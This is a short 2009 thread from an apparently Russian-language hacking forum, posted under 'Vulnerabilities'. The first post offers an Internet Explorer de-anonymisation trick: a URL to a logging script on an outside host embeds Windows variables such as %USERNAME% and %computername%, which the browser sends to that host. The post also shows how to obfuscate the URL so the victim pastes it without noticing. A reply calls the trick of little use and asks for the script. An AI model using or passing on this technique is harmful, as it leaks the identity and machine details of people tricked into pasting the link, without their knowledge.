*де-анонимизация* пользователей IE8

Discussion in 'Уязвимости' started by Что? Где? Когда?, 9 Sep 2009.

  1. Что? Где? Когда?

    Joined:
    29 Aug 2009
    Messages:
    2
    Likes Received:
    15
    Reputations:
    0
    Работает только в IE:
    http://site.com/siniffer.cgi/[переменная]
    Пример: http://ha.ckers.org/log.cgi/%USERNAME%
    Можно замаскировать: http://ha.ckers.org/log.cgi/rAnd0mcr4p%uSernAmE%2hide%coMpuTeRnaME%th3v4rz

    Некоторые переменные:
    %USERNAME% - имя пользователя
    %computername% - имя компьютера
    %SystemDrive% - системный диск
    %PROCESSOR_IDENTIFIER% - описание процессора [Family, Model, Stepping, ModelName]

    Важное условие, юзер должен сам скопировать и вставить этот url.
    Источник: http://ha.ckers.org/blog/20090810/de-cloaking-in-ie70-via-windows-variables/
     
    10 people like this.
  2. BrainDeaD

    BrainDeaD Elder - Старейшина

    Joined:
    9 Jun 2005
    Messages:
    774
    Likes Received:
    292
    Reputations:
    214
    большой пользы в этом невижу, но интересно. хотелось бы увидеть сам скрипт.
     
    1 person likes this.